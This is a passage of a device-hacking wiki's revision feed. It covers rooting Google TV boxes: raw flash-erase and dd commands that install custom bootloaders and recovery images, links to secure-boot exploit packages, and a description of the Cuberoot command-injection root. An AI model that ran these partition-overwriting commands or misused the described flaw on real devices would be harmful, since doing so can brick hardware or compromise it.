#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cd /data/local/tmp&lt;br /&gt;
#: dd of=/mnt/media/usb.LABEL/gtvhacker-recovery if=/mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin bs=2048&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;cd /data/local/tmp&lt;br /&gt;
#: dd if=/mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-mtd8 bs=2048&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Sony_NSZ-GS7_(Streamer)&amp;diff=1185</id>
		<title>Sony NSZ-GS7 (Streamer)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Sony_NSZ-GS7_(Streamer)&amp;diff=1185"/>
		<updated>2013-07-29T12:50:00Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Update History */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Sony-NSZ-GS7.jpg|250px|left|thumb]]&lt;br /&gt;
[[Category:Sony]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Sony NSZ-GS7 (Network Streamer).&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
*Marvell Armada 1500(88de3100)&amp;lt;sup&amp;gt;1&amp;lt;/sup&amp;gt; 1.2 GHz dual-core processor, with a 750 MHz GPU&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*8 GB Samsung Flash NAND - KLM8G2FEJA-A002&lt;br /&gt;
&lt;br /&gt;
== Tear Down ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Sony nsz-gs7 top board1.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board2.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board3.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board4.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board5.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board6.jpg&lt;br /&gt;
File:Sony nsz-gs7 top board7.jpg&lt;br /&gt;
File:Sony nsz-gs7 bottom board.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Recovery Mode ==&lt;br /&gt;
[[File:Sony_nsz-gs7_recovery.jpg|thumb|left]]&lt;br /&gt;
#Unplug power from the NSZ-GS7&lt;br /&gt;
#Press and hold the connect button and plug the unit in.&lt;br /&gt;
#Continue to hold down the connect button for 5 seconds after plugging the unit in, then release the connect button.&lt;br /&gt;
#Wait a couple of seconds and the screen will show the recovery menu.&lt;br /&gt;
#You can use a USB keyboard to navigate through the menu or you can navigate using the connect button (Short press navigates down while a long press selects).&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
&lt;br /&gt;
USA:&lt;br /&gt;
*REL01_NSZGS7_U2_1046_663_3110_20120529_URSC - Factory Firmware&lt;br /&gt;
*REL02_NSZGS7_U2_1004_836_3621_20120620_URSC - First OTA Update - [http://android.clients.google.com/packages/data/ota/sony_beetle/4eca714a6734.PKG_REL02_NSZGS7_U2_1004_836_3621_20120620_URSC.zip Download]&lt;br /&gt;
*REL02_NSZGS7_U2_1005_887_3790_20120628_URSC - Second OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/2f2bf5208b2a.PKG_REL02_NSZGS7_U2_1005_887_3790_20120628_URSC.zip Download]&lt;br /&gt;
*REL03_NSZGS7_U2_1104_4384_20120724_URSC - Third OTA Update (Media Player Added) - [http://android.clients.google.com/packages/ota/sony_beetle/76bf93519436.PKG_REL03_NSZGS7_U2_1104_4384_20120724_URSC.zip Download]&lt;br /&gt;
*REL04_NSZGS7_U2_1210_5720_20120928_URSC - Fourth OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/5cae61486b96.PKG_REL04_NSZGS7_U2_1210_5720_20120928_URSC.zip Download]&lt;br /&gt;
*REL05_NSZGS7_U2_1303_6289_20121024_URSC - Fifth OTA Update - [http://android.clients.google.com/packages/data/ota/sony_beetle/8a35afb3c3ca.PKG_REL05_NSZGS7_U2_1303_6289_20121024_URSC.zip Download]&lt;br /&gt;
*REL06_NSZGS7_U2_1403_6928_20121120_URSC - Sixth OTA Update ([http://forum.gtvhacker.com/post7245.html#p7245 Change Log]) - [http://android.clients.google.com/packages/data/ota/sony_beetle/872faf0d8b49.PKG_REL06_NSZGS7_U2_1403_6928_20121120_URSC.zip Download]&lt;br /&gt;
*REL10_NSZGS7_U2_2203_133772_20130529_URSC - Tenth OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/f85aaa961c4e.PKG_REL10_NSZGS7_U2_2203_133772_20130529_URSC.zip Download]&lt;br /&gt;
&lt;br /&gt;
Canada:&lt;br /&gt;
*REL03_NSZGS7_CA2_1104_4384_20120724_URSC - First OTA Update (Equivalent to 3rd US) - [http://android.clients.google.com/packages/ota/sony_beetle_ca2/f14f067ada65.PKG_REL03_NSZGS7_CA2_1104_4384_20120724_URSC.zip Download]&lt;br /&gt;
&lt;br /&gt;
United Kingdom:&lt;br /&gt;
&lt;br /&gt;
*REL03_NSZGS7_CEK_1104_4384_20120724_URSC - First OTA Update (Equivalent to 3rd US) - [http://android.clients.google.com/packages/ota/sony_beetle_cek/a75f9ea6d1b6.PKG_REL03_NSZGS7_CEK_1104_4384_20120724_URSC.zip Download]&lt;br /&gt;
&lt;br /&gt;
== NSZ-GS7 Root Demo ==&lt;br /&gt;
On July 29th, 2012 the GTVHacker team demonstrated the first root for the NSZ-GS7 at DEFCON 20.&lt;br /&gt;
&lt;br /&gt;
== GPL Code ==&lt;br /&gt;
You can find GPL code for the NSZ-GS7 at [http://www.sony.net/Products/Linux/TV/NSZ-GS7.html Sony Global]&lt;br /&gt;
&lt;br /&gt;
== Related ==&lt;br /&gt;
1. http://www.marvell.com/digital-entertainment/armada-1500/assets/Marvell-ARMADA-1500-Product-Brief.pdf&lt;br /&gt;
&lt;br /&gt;
2. http://www.account.anandtech.com/Show/Index/5296?cPage=3&amp;amp;all=False&amp;amp;sort=0&amp;amp;page=2&amp;amp;slug=google-tv-goes-arm-with-marvells-armada-1500&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1136</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1136"/>
		<updated>2013-05-27T17:21:14Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Cuberoot */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
[[File:Cuberoot.png|200px|right|thumb]]&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download [http://download.gtvhacker.com/file/asus/Cuberoot.apk Here]&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1135</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1135"/>
		<updated>2013-05-17T06:53:15Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Cuberoot */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
[[File:Cuberoot.png|200px|right|thumb]]&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk Here]&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1134</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1134"/>
		<updated>2013-05-17T06:52:51Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
[[File:Cuberoot.png|200px|left|thumb]]&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk | Here]&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:Cuberoot.png&amp;diff=1133</id>
		<title>File:Cuberoot.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:Cuberoot.png&amp;diff=1133"/>
		<updated>2013-05-17T06:52:05Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1132</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1132"/>
		<updated>2013-05-17T06:49:33Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Cuberoot */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk | Here]&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
